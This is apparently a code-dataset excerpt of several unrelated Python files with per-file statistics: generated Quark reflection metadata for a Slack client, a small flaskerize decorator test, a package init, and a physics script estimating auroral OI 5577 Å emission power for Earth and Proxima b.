return slack.Channel(_cast((args)[0], lambda: slack.Client), _cast((args)[1], lambda: unicode))
def isAbstract(self):
return False
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
slack_Channel.singleton = slack_Channel()
class slack_Client_connect_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_connect_Method, self).__init__(u"quark.void", u"connect", _List([]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
(obj).connect();
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client_request_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_request_Method, self).__init__(u"quark.void", u"request", _List([u"quark.String", u"quark.Map<quark.String,quark.Object>", u"quark.HTTPHandler"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
(obj).request(_cast((args)[0], lambda: unicode), _cast((args)[1], lambda: _Map), _cast((args)[2], lambda: quark.HTTPHandler));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client_ws_connect_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_ws_connect_Method, self).__init__(u"quark.void", u"ws_connect", _List([u"quark.String"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
(obj).ws_connect(_cast((args)[0], lambda: unicode));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client_ws_send_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_ws_send_Method, self).__init__(u"quark.void", u"ws_send", _List([u"quark.String"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
(obj).ws_send(_cast((args)[0], lambda: unicode));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client_onWSConnected_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_onWSConnected_Method, self).__init__(u"quark.void", u"onWSConnected", _List([u"quark.WebSocket"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
(obj).onWSConnected(_cast((args)[0], lambda: quark.WebSocket));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client_onWSClose_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_onWSClose_Method, self).__init__(u"quark.void", u"onWSClose", _List([u"quark.WebSocket"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
(obj).onWSClose(_cast((args)[0], lambda: quark.WebSocket));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client_onWSError_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_onWSError_Method, self).__init__(u"quark.void", u"onWSError", _List([u"quark.WebSocket", u"quark.WSError"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
(obj).onWSError(_cast((args)[0], lambda: quark.WebSocket), _cast((args)[1], lambda: quark.WSError));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client_construct_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_construct_Method, self).__init__(u"slack.event.SlackEvent", u"construct", _List([u"quark.String"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
return (obj).construct(_cast((args)[0], lambda: unicode))
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client_onWSMessage_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_onWSMessage_Method, self).__init__(u"quark.void", u"onWSMessage", _List([u"quark.WebSocket", u"quark.String"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
(obj).onWSMessage(_cast((args)[0], lambda: quark.WebSocket), _cast((args)[1], lambda: unicode));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client_onHTTPResponse_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_onHTTPResponse_Method, self).__init__(u"quark.void", u"onHTTPResponse", _List([u"quark.HTTPRequest", u"quark.HTTPResponse"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
(obj).onHTTPResponse(_cast((args)[0], lambda: quark.HTTPRequest), _cast((args)[1], lambda: quark.HTTPResponse));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client_onWSInit_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_onWSInit_Method, self).__init__(u"quark.void", u"onWSInit", _List([u"quark.WebSocket"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
(obj).onWSInit(_cast((args)[0], lambda: quark.WebSocket));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client_onWSBinary_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_onWSBinary_Method, self).__init__(u"quark.void", u"onWSBinary", _List([u"quark.WebSocket", u"quark.Buffer"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
(obj).onWSBinary(_cast((args)[0], lambda: quark.WebSocket), (args)[1]);
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client_onWSClosed_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_onWSClosed_Method, self).__init__(u"quark.void", u"onWSClosed", _List([u"quark.WebSocket"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
(obj).onWSClosed(_cast((args)[0], lambda: quark.WebSocket));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client_onWSFinal_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_onWSFinal_Method, self).__init__(u"quark.void", u"onWSFinal", _List([u"quark.WebSocket"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
(obj).onWSFinal(_cast((args)[0], lambda: quark.WebSocket));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client_onHTTPInit_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_onHTTPInit_Method, self).__init__(u"quark.void", u"onHTTPInit", _List([u"quark.HTTPRequest"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
(obj).onHTTPInit(_cast((args)[0], lambda: quark.HTTPRequest));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client_onHTTPError_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_onHTTPError_Method, self).__init__(u"quark.void", u"onHTTPError", _List([u"quark.HTTPRequest", u"quark.HTTPError"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
(obj).onHTTPError(_cast((args)[0], lambda: quark.HTTPRequest), _cast((args)[1], lambda: quark.HTTPError));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client_onHTTPFinal_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_onHTTPFinal_Method, self).__init__(u"quark.void", u"onHTTPFinal", _List([u"quark.HTTPRequest"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
(obj).onHTTPFinal(_cast((args)[0], lambda: quark.HTTPRequest));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client(quark.reflect.Class):
def _init(self):
quark.reflect.Class._init(self)
def __init__(self):
super(slack_Client, self).__init__(u"slack.Client");
(self).name = u"slack.Client"
(self).parameters = _List([])
(self).fields = _List([quark.reflect.Field(u"quark.Runtime", u"runtime"), quark.reflect.Field(u"quark.String", u"token"), quark.reflect.Field(u"slack.SlackHandler", u"handler"), quark.reflect.Field(u"quark.int", u"event_id"), quark.reflect.Field(u"quark.WebSocket", u"socket")])
(self).methods = _List([slack_Client_connect_Method(), slack_Client_request_Method(), slack_Client_ws_connect_Method(), slack_Client_ws_send_Method(), slack_Client_onWSConnected_Method(), slack_Client_onWSClose_Method(), slack_Client_onWSError_Method(), slack_Client_construct_Method(), slack_Client_onWSMessage_Method(), slack_Client_onHTTPResponse_Method(), slack_Client_onWSInit_Method(), slack_Client_onWSBinary_Method(), slack_Client_onWSClosed_Method(), slack_Client_onWSFinal_Method(), slack_Client_onHTTPInit_Method(), slack_Client_onHTTPError_Method(), slack_Client_onHTTPFinal_Method()])
(self).parents = _List([u"quark.Object"])
def construct(self, args):
return slack.Client(_cast((args)[0], lambda: quark.Runtime), _cast((args)[1], lambda: unicode), _cast((args)[2], lambda: slack.SlackHandler))
def isAbstract(self):
return False
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
slack_Client.singleton = slack_Client()
class slackpack_Handler_onSlackEvent_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slackpack_Handler_onSlackEvent_Method, self).__init__(u"quark.void", u"onSlackEvent", _List([u"slack.event.SlackEvent"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slackpack.Handler);
(obj).onSlackEvent(_cast((args)[0], lambda: slack.event.SlackEvent));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slackpack_Handler_onHello_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slackpack_Handler_onHello_Method, self).__init__(u"quark.void", u"onHello", _List([u"slack.event.Hello"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slackpack.Handler);
(obj).onHello(_cast((args)[0], lambda: slack.event.Hello));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slackpack_Handler_onSlackError_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slackpack_Handler_onSlackError_Method, self).__init__(u"quark.void", u"onSlackError", _List([u"slack.event.SlackError"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slackpack.Handler);
(obj).onSlackError(_cast((args)[0], lambda: slack.event.SlackError));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slackpack_Handler_onMessage_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slackpack_Handler_onMessage_Method, self).__init__(u"quark.void", u"onMessage", _List([u"slack.event.Message"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slackpack.Handler);
(obj).onMessage(_cast((args)[0], lambda: slack.event.Message));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slackpack_Handler(quark.reflect.Class):
def _init(self):
quark.reflect.Class._init(self)
def __init__(self):
super(slackpack_Handler, self).__init__(u"slackpack.Handler");
(self).name = u"slackpack.Handler"
(self).parameters = _List([])
(self).fields = _List([])
(self).methods = _List([slackpack_Handler_onSlackEvent_Method(), slackpack_Handler_onHello_Method(), slackpack_Handler_onSlackError_Method(), slackpack_Handler_onMessage_Method()])
(self).parents = _List([u"quark.Object"])
def construct(self, args):
return slackpack.Handler()
def isAbstract(self):
return False
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
slackpack_Handler.singleton = slackpack_Handler()
class quark_Map_quark_String_quark_Object_(quark.reflect.Class):
    # Generated reflection metadata for the instantiated generic type
    # quark.Map<quark.String,quark.Object>.
    def _init(self):
        quark.reflect.Class._init(self)
    def __init__(self):
        super(quark_Map_quark_String_quark_Object_, self).__init__(u"quark.Map<quark.String,quark.Object>");
        (self).name = u"quark.Map"
        # Generic type arguments recorded as parameter names.
        (self).parameters = _List([u"quark.String", u"quark.Object"])
        (self).fields = _List([])
        (self).methods = _List([])
        (self).parents = _List([u"quark.Object"])
    def construct(self, args):
        # Maps are constructed empty; constructor arguments are ignored.
        return _Map()
    def isAbstract(self):
        return False
    def _getClass(self):
        return _cast(None, lambda: unicode)
    def _getField(self, name):
        return None
    def _setField(self, name, value):
        pass
quark_Map_quark_String_quark_Object_.singleton = quark_Map_quark_String_quark_Object_()
class Root(_QObject):
    # Generated holder object; class-level *_md attributes (assigned right
    # after this definition) point at the singleton metadata of each type.
    def _init(self):
        pass
    def __init__(self): self._init()
    def _getClass(self):
        return _cast(None, lambda: unicode)
    def _getField(self, name):
        return None
    def _setField(self, name, value):
        pass
# Expose the singleton metadata object of every known type on Root.
Root.slack_event_SlackEvent_md = slack_event_SlackEvent.singleton
Root.slack_event_SlackError_md = slack_event_SlackError.singleton
Root.slack_event_Hello_md = slack_event_Hello.singleton
Root.slack_event_Message_md = slack_event_Message.singleton
Root.slack_event_Edited_md = slack_event_Edited.singleton
Root.slack_SlackHandler_md = slack_SlackHandler.singleton
Root.slack_User_md = slack_User.singleton
Root.slack_Channel_md = slack_Channel.singleton
Root.slack_Client_md = slack_Client.singleton
Root.slackpack_Handler_md = slackpack_Handler.singleton
Root.quark_Map_quark_String_quark_Object__md = quark_Map_quark_String_quark_Object_.singleton
# Deferred imports: each callback imports its module and publishes the
# resulting name into this module's globals via globals().update(locals()).
# NOTE(review): presumably this defers imports to break cycles between the
# generated modules -- confirm against the _lazyImport implementation.
def _lazy_import_slack_event():
    import slack.event
    globals().update(locals())
_lazyImport("import slack.event", _lazy_import_slack_event)
def _lazy_import_slack():
    import slack
    globals().update(locals())
_lazyImport("import slack", _lazy_import_slack)
def _lazy_import_quark():
    import quark
    globals().update(locals())
_lazyImport("import quark", _lazy_import_quark)
def _lazy_import_slackpack():
    import slackpack
    globals().update(locals())
_lazyImport("import slackpack", _lazy_import_slackpack)
# Trigger any lazy imports registered up to this point.
_lazyImport.pump("slackpack_md.slack_event_SlackEvent_load_Method")
| 32.768943
| 605
| 0.669683
| 4,367
| 35,030
| 5.062972
| 0.026792
| 0.04957
| 0.045771
| 0.043691
| 0.851379
| 0.814337
| 0.791
| 0.761465
| 0.75052
| 0.744821
| 0
| 0.001816
| 0.198144
| 35,030
| 1,068
| 606
| 32.799625
| 0.785325
| 0
| 0
| 0.756997
| 0
| 0
| 0.07642
| 0.012275
| 0
| 0
| 0
| 0
| 0
| 1
| 0.368957
| false
| 0.059796
| 0.026718
| 0.145038
| 0.642494
| 0.001272
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
|
0
| 10
|
ebf7877309b313ad57806c703de5bf1c98197d7f
| 320
|
py
|
Python
|
flaskerize/custom_functions_test.py
|
ehoeffner/flaskerize
|
cb887a80ae0a2c06f61cf941e029fd7174fdd233
|
[
"BSD-3-Clause"
] | 119
|
2019-05-07T00:48:58.000Z
|
2022-03-30T07:17:53.000Z
|
flaskerize/custom_functions_test.py
|
darkguinito/myflaskerize
|
e76e3e4b6c91e2859b974aabf82e0ea5539bcf1b
|
[
"BSD-3-Clause"
] | 36
|
2019-04-28T11:14:56.000Z
|
2022-03-28T16:09:21.000Z
|
flaskerize/custom_functions_test.py
|
darkguinito/myflaskerize
|
e76e3e4b6c91e2859b974aabf82e0ea5539bcf1b
|
[
"BSD-3-Clause"
] | 15
|
2019-08-29T17:38:28.000Z
|
2021-04-29T02:27:59.000Z
|
from flaskerize import register_custom_function, registered_funcs
def test_register_custom_function():
    """Only functions passed through the decorator land in the registry."""
    def plain():
        # Deliberately left undecorated; must not be registered.
        return 1

    @register_custom_function
    def decorated():
        return 42

    assert len(registered_funcs) == 1
    registered = registered_funcs[0]
    assert registered() == decorated()
    assert registered() != plain()
| 21.333333
| 65
| 0.678125
| 39
| 320
| 5.282051
| 0.461538
| 0.291262
| 0.320388
| 0.242718
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.040323
| 0.225
| 320
| 14
| 66
| 22.857143
| 0.790323
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.3
| 1
| 0.3
| true
| 0
| 0.1
| 0.2
| 0.6
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
00175dafaa2dbf1b0be80d959b14c15463ce25c4
| 94
|
py
|
Python
|
treeqn/utils/bl_common/__init__.py
|
chinnadhurai/treeqn
|
f230ad51731cccec00671b951882a2a2d0cc11e4
|
[
"MIT"
] | 107
|
2018-03-09T14:28:21.000Z
|
2022-03-23T08:24:48.000Z
|
treeqn/utils/bl_common/__init__.py
|
chinnadhurai/treeqn
|
f230ad51731cccec00671b951882a2a2d0cc11e4
|
[
"MIT"
] | 3
|
2018-05-01T16:31:41.000Z
|
2018-10-04T15:57:41.000Z
|
treeqn/utils/bl_common/__init__.py
|
chinnadhurai/treeqn
|
f230ad51731cccec00671b951882a2a2d0cc11e4
|
[
"MIT"
] | 22
|
2018-03-09T23:17:27.000Z
|
2020-12-11T20:53:05.000Z
|
from treeqn.utils.bl_common.math_util import *
from treeqn.utils.bl_common.misc_util import *
| 31.333333
| 46
| 0.829787
| 16
| 94
| 4.625
| 0.5625
| 0.27027
| 0.405405
| 0.459459
| 0.621622
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085106
| 94
| 2
| 47
| 47
| 0.860465
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
004697482942dad4b22eb7a23fb4b8f2c3a5ce88
| 16,524
|
py
|
Python
|
signal/power_m2.py
|
rodluger/exoaurora
|
0ec1c59c368ccbf0c9eb2450d52b7ec7897ce322
|
[
"MIT"
] | 1
|
2021-01-18T04:23:34.000Z
|
2021-01-18T04:23:34.000Z
|
signal/power_m2.py
|
rodluger/exoaurora
|
0ec1c59c368ccbf0c9eb2450d52b7ec7897ce322
|
[
"MIT"
] | null | null | null |
signal/power_m2.py
|
rodluger/exoaurora
|
0ec1c59c368ccbf0c9eb2450d52b7ec7897ce322
|
[
"MIT"
] | 2
|
2021-01-18T04:23:38.000Z
|
2022-03-06T11:03:53.000Z
|
# -*- coding: utf-8 -*-
"""
this script computes the expected auroral power output for the
oi 5577 angstrom line for proxima b, given stellar wind conditions
for planet 'b' from cohen et al 2014
@author: mtilley [matt a. tilley, university of washington]
@email: mtilley (at) uw (dot) edu
"""
# imports
from __future__ import print_function, division
import numpy as np
from numpy import linalg as la
import scipy as sp
import scipy.constants as spcon
import auroral_signal as asig
'''
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
relevant parameters
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
'''
# Stellar-wind parameters (include the planet's relative orbital motion);
# values for planet 'b' from Cohen et al. 2014, per the module docstring.
# sub-Alfvenic stellar wind
nsub = 433. # number density [cm^-3]
vsub = [-630.,-48.3,30.] # velocity vector [km s^-1]
bsub = [-804.,-173.,63.] # IMF vector [nT]
tsub = 3.42 # temperature [10^5 K]
# super-Alfvenic stellar wind
nsup = 12895. # number density [cm^-3]
vsup = [-202.,54.7,22.] # velocity vector [km s^-1]
bsup = [-57.,-223.,92.] # IMF vector [nT]
tsup = 4.77 # temperature [10^5 K]
# CME scaling using the Wang et al. formula with nominal increases in
# density, velocity, and IMF [arb]
cme_scale = 10**0.24 * 3.**1.47 * 15**0.86
# energy per photon, E = h*c/lambda [J photon^-1]
e_5577 = spcon.h*spcon.c/5.577e-7 # OI 5577 A line (5.577e-7 m)
e_1041 = spcon.h*spcon.c/1.041e-7 # 1041 A UV band center (1.041e-7 m)
# electron fraction of auroral precipitation -- Hubert 2002 [arb]
e_frac = 0.8
# Steele & McEwen conversion efficiency [photons (erg cm^-2 s^-1)^-1]
oi_eff = 1.48e9
# Mauk 1994 conversion efficiency for the UV band [photons (erg cm^-2 s^-1)^-1]
uv_eff = 5.e9
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
'''
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
power estimations
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
'''
# power estimated at earth
print( '\n-=-=-=-=-=-=-=-=-=-=-' )
print( '\n\tearth\n' )
print( '-=-=-=-=-=-=-=-=-=-=-\n' )
# magnetopause distance
dist = asig.mpause_dist()
print( ' estimated sub-stellar magnetopause distance: %.3e' % dist + ' m\n' )
# auroral oval
oval = asig.auroral_oval()*1.e4
print( ' estimated auroral oval area: %.3e' % oval + ' cm^2\n' )
print( ' estimated auroral energetic particle power delivered to auroral regions:\n' )
# quiet magnetosphere
power_out_q = asig.power_calc()
print( ' quiet\t\t-\t%.3e' % power_out_q + ' w' )
# stormy magnetosphere
power_out_s = asig.power_calc( theta=spcon.pi )
print( ' substorm\t-\t%.3e' % power_out_s + ' w' )
# cme wind conditions
power_out_c = asig.power_calc()*cme_scale
print( ' cme\t\t-\t%.3e' % power_out_c + ' w' )
# cme wind conditions + stormy magnetosphere
power_out_cs = asig.power_calc( theta=spcon.pi )*cme_scale
print( ' cme+substorm\t-\t%.3e' % power_out_cs + ' w' )
print( '\n estimated auroral power for the oi 5577 a line:\n' )
# 5577 power out for quiet msphere, both hemispheres
out_5577_q = oi_eff*power_out_q*1.e7*e_frac*2*e_5577
print( ' quiet 5577\t-\t%.3e' % out_5577_q + ' w' )
# 5577 power out for stormy msphere, both hemispheres
out_5577_s = oi_eff*power_out_s*1.e7*e_frac*2*e_5577
print( ' substorm 5577\t-\t%.3e' % out_5577_s + ' w' )
# 5577 power out for cme winds, both hemispheres
out_5577_c = oi_eff*power_out_c*1.e7*e_frac*2*e_5577
print( ' cme 5577\t-\t%.3e' % out_5577_c + ' w' )
# 5577 power out for cme winds + stormy msphere, both hemispheres
out_5577_cs = oi_eff*power_out_cs*1.e7*e_frac*2*e_5577
print( ' cme+ss 5577\t-\t%.3e' % out_5577_cs + ' w' )
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# power estimated at
print( '\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-' )
print( '\n proxima b - sub-alfvenic,earth-like dipole\n' )
print( '-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n' )
# magnetopause distance
dist = asig.mpause_dist( nsub, la.norm(vsub), asig.m_earth )
print( ' estimated sub-stellar magnetopause distance: %.3e' % dist + ' m\n' )
# auroral oval
oval = asig.auroral_oval( dist )*1.e4
print( ' estimated auroral oval area: %.3e' % oval + ' cm^2\n' )
# imf clock angle and transverse imf
imf_clock = np.arctan2( abs(bsub[1]), bsub[2] )
b_t = np.sqrt( bsub[1]**2. + bsub[2]**2. )
print( ' estimated auroral energetic particle power delivered to auroral regions:\n' )
# quiet magnetosphere
power_out_q = asig.power_calc( nsub, la.norm(vsub), b_t, imf_clock, asig.m_earth )
print( ' quiet\t\t-\t%.3e' % power_out_q + ' w' )
# stormy magnetosphere
power_out_s = asig.power_calc( nsub, la.norm(vsub), b_t, spcon.pi, asig.m_earth )
print( ' substorm\t-\t%.3e' % power_out_s + ' w' )
# cme wind conditions
power_out_c = asig.power_calc( nsub, la.norm(vsub), b_t, imf_clock, asig.m_earth )*cme_scale
print( ' cme\t\t-\t%.3e' % power_out_c + ' w' )
# cme wind conditions + stormy magnetosphere
power_out_cs = asig.power_calc( nsub, la.norm(vsub), b_t, spcon.pi, asig.m_earth )*cme_scale
print( ' cme+substorm\t-\t%.3e' % power_out_cs + ' w' )
print( '\n estimated auroral power for the oi 5577 a line:\n' )
# 5577 power out for quiet msphere, both hemispheres
out_5577_q = oi_eff*power_out_q*1.e7*e_frac*2*e_5577
print( ' quiet 5577\t-\t%.3e' % out_5577_q + ' w' )
# 5577 power out for stormy msphere, both hemispheres
out_5577_s = oi_eff*power_out_s*1.e7*e_frac*2*e_5577
print( ' substorm 5577\t-\t%.3e' % out_5577_s + ' w' )
# 5577 power out for cme winds, both hemispheres
out_5577_c = oi_eff*power_out_c*1.e7*e_frac*2*e_5577
print( ' cme 5577\t-\t%.3e' % out_5577_c + ' w' )
# 5577 power out for cme winds + stormy msphere, both hemispheres
out_5577_cs = oi_eff*power_out_cs*1.e7*e_frac*2*e_5577
print( ' cme+ss 5577\t-\t%.3e' % out_5577_cs + ' w' )
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# power estimated at
print( '\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-' )
print( '\n proxima b - super-alfvenic,earth-like dipole\n' )
print( '-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n' )
# magnetopause distance
dist = asig.mpause_dist( nsup, la.norm(vsup), asig.m_earth )
print( ' estimated sub-stellar magnetopause distance: %.3e' % dist + ' m\n' )
# auroral oval
oval = asig.auroral_oval( dist )*1.e4
print( ' estimated auroral oval area: %.3e' % oval + ' cm^2\n' )
# imf clock angle and transverse imf
imf_clock = np.arctan2( abs(bsup[1]), bsup[2] )
b_t = np.sqrt( bsup[1]**2. + bsup[2]**2. )
print( ' estimated auroral energetic particle power delivered to auroral regions:\n' )
# quiet magnetosphere
power_out_q = asig.power_calc( nsup, la.norm(vsup), b_t, imf_clock, asig.m_earth )
print( ' quiet\t\t-\t%.3e' % power_out_q + ' w' )
# stormy magnetosphere
power_out_s = asig.power_calc( nsup, la.norm(vsup), b_t, spcon.pi, asig.m_earth )
print( ' substorm\t-\t%.3e' % power_out_s + ' w' )
# cme wind conditions
power_out_c = asig.power_calc( nsup, la.norm(vsup), b_t, imf_clock, asig.m_earth )*cme_scale
print( ' cme\t\t-\t%.3e' % power_out_c + ' w' )
# cme wind conditions + stormy magnetosphere
power_out_cs = asig.power_calc( nsup, la.norm(vsup), b_t, spcon.pi, asig.m_earth )*cme_scale
print( ' cme+substorm\t-\t%.3e' % power_out_cs + ' w' )
print( '\n estimated auroral power for the oi 5577 a line:\n' )
# 5577 power out for quiet msphere, both hemispheres
out_5577_q = oi_eff*power_out_q*1.e7*e_frac*2*e_5577
print( ' quiet 5577\t-\t%.3e' % out_5577_q + ' w' )
# 5577 power out for stormy msphere, both hemispheres
out_5577_s = oi_eff*power_out_s*1.e7*e_frac*2*e_5577
print( ' substorm 5577\t-\t%.3e' % out_5577_s + ' w' )
# 5577 power out for cme winds, both hemispheres
out_5577_c = oi_eff*power_out_c*1.e7*e_frac*2*e_5577
print( ' cme 5577\t-\t%.3e' % out_5577_c + ' w' )
# 5577 power out for cme winds + stormy msphere, both hemispheres
out_5577_cs = oi_eff*power_out_cs*1.e7*e_frac*2*e_5577
print( ' cme+ss 5577\t-\t%.3e' % out_5577_cs + ' w' )
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# power estimated at
print( '\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-' )
print( '\n proxima b - sub-alfvenic,neptune-like dipole\n' )
print( '-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n' )
# magnetopause distance
dist = asig.mpause_dist( nsub, la.norm(vsub), asig.m_neptune )
print( ' estimated sub-stellar magnetopause distance: %.3e' % dist + ' m\n' )
# auroral oval
oval = asig.auroral_oval( dist )*1.e4
print( ' estimated auroral oval area: %.3e' % oval + ' cm^2\n' )
# imf clock angle and transverse imf
imf_clock = np.arctan2( abs(bsub[1]), bsub[2] )
b_t = np.sqrt( bsub[1]**2. + bsub[2]**2. )
